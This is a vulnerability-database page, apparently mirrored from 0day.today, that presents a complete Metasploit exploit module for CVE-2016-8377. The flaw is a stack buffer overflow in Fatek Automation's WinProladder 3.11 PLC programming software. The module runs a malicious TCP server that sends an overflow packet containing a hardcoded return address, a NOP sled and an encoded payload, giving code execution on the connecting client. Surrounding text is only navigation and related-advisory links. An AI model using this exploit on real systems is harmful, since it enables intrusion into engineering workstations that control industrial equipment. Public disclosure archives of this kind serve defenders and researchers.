Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtJames Fitts1337DAY-ID-28543
HistorySep 13, 2017 - 12:00 a.m.

Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow Exploit

2017-09-1300:00:00
James Fitts
0day.today
53

EPSS

0.062

Percentile

93.6%

JSON

Exploit for windows platform in category remote exploits

require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
    Rank = GreatRanking
 
    include Msf::Exploit::Remote::TcpServer
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Fatek Automation PLC WinProladder Stack-based Buffer Overflow',
            'Description'    => %q{
                This module exploits a stack based buffer overflow found in Fatek Automation
                PLC WinProladder v3.11 Build 14701. The vulnerability is triggered when a client
                connects to a listening server. The client does not properly sanitize the length
                of the received input prior to placing it on the stack.
            },
            'Author'         => [ 'james fitts' ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'ZDI', '16-672' ],
                    [ 'CVE', '2016-8377' ],
                    [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-350-01' ]
                ],
            'Privileged'     => false,
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'    => 1000,
                    'BadChars' => "\x00\x0a\x0d\x20",
                    'StackAdjustment' => -3500
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [
                        'Windows 7 EN', 
                            {
                                # CC3250MT.dll
                                # pop ecx/ pop ebp/ retn
                                'Ret' => 0x32514d79
                            } 
                    ],
                ],
            'DefaultTarget' => 0,
            'DisclosureDate' => 'Dec 15 2016'))
 
        register_options(
            [
                OptPort.new('SRVPORT', [ true, "The port to listen on", 500])
            ], self.class)
    end
 
    def on_client_data(client)
        p = payload.encoded
 
        pkt = "A" * 10000
        pkt[1092, 4] = [0x04eb9090].pack('V')   # jmp $+6
        pkt[1096, 4] = [target.ret].pack('V')
        pkt[1100, 50] = "\x90" * 50
        pkt[1150, p.length] = p
 
        client.put(pkt)
        handler
        service.close_client(client)
    end
 
end

#  0day.today [2018-03-01]  #

Related

packetstorm 1
exploitdb 1
cve 1
zdi 1
nvd 1
prion 1
ics 1
cvelist 1
checkpoint_advisories 1
packetstorm
packetstorm
Fatek Automation PLC WinProladder 3.11 Build 14701 Buffer Overflow
2017-09-14 00:00:00
exploitdb
exploitdb
Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack Buffer Overflow (Metasploit)
2017-09-13 00:00:00
cve
cve
CVE-2016-8377
2017-02-13 21:59:01
zdi
zdi
Fatek Automation PLC WinProladder Stack-based Buffer Overflow Remote Code Execution Vulnerability
2016-12-15 00:00:00
nvd
nvd
CVE-2016-8377
2017-02-13 21:59:01
prion
prion
Stack overflow
2017-02-13 21:59:00
ics
ics
FATEK Automation PLC WinProladder Stack-Based Buffer Overflow Vulnerability
2021-04-08 12:00:00
cvelist
cvelist
CVE-2016-8377
2017-02-13 21:00:00
checkpoint_advisories
checkpoint_advisories
Fatek Automation PLC WinProladder Stack Buffer Overflow (CVE-2016-8377)
2017-02-26 00:00:00

EPSS

0.062

Percentile

93.6%

JSON
Related for 1337DAY-ID-28543
packetstorm1exploitdb1cve1zdi1nvd1prion1ics1cvelist1checkpoint_advisories1